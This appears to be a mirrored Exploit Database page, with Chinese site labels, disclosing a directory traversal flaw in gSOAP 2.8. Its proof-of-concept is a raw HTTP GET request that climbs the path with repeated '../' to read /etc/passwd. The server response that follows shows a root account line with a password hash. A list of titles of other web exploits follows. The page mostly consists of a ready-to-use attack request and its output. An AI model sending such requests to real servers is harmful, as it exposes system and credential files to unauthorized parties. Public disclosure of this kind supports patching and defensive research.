gSOAP 2.8 – Directory Traversal

Exploit Database
18 阅读

作者： numan türle

日期： 2019-11-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47653/

# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap


POC
---------

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh

last Exploits
gSOAP 2.8 – Directory Traversal的更多信息

Online News Portal System 1.0 – ‘Title’ Stored Cross Site Scripting：
GetSimple CMS Plugin Multi User 1.8.2 – Cross-Site Request Forgery (Add Admin)：
ManageEngine Password Manager Pro 8102 to 8302 – Multiple Vulnerabilities：
Basic Analysis and Security Engine (BASE) 1.4.5 – ‘base_payload.php?base_path’ Remote File Inclusion：
Inout Webmail Ultimate Edition 4.0 Script – Improper Access Restrictions：
LabStoRe 1.5.4 – SQL Injection：
cardinalCMS 1.2 – ‘FCKeditor’ Arbitrary File Upload：
GUnet OpenEclass E-learning platform 1.7.3 – ‘uname’ SQL Injection：